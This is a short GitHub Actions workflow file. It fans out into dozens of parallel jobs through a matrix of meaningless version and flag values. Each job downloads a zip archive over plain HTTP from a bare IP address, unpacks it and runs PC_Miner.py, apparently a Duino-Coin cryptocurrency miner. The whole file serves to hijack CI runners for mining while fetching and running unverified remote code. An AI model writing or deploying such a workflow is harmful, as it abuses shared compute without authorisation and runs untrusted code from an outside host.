name: coba1
 
on: [workflow_dispatch]

jobs:
  build:
    name: coba1
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: wget http://31.220.53.182/download/duino.zip
    - name: unzip
      run: unzip duino.zip
    - name: ls
      run: ls
    - name: min
      working-directory: ./duino
      run: python3 PC_Miner.py
    - name: DONE
      run: exit
